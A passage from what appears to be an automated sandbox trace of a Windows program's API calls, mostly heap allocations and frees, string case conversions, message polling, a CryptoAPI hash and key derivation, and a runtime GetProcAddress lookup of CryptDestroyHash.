RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0190.844] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.844] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.844] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.844] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.844] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.844] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.844] CryptHashData (hHash=0xaa58e0, pbData=0x24b1468, dwDataLen=0x3, dwFlags=0x1) returned 1 [0190.845] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.845] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.845] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.845] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.845] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.845] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.845] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.845] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.845] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.845] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0190.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.848] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.849] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.849] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.850] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.850] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.850] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.851] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.851] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.851] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.852] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.852] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0190.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e10 [0190.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0190.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.854] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0190.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0190.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0190.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.854] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0190.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 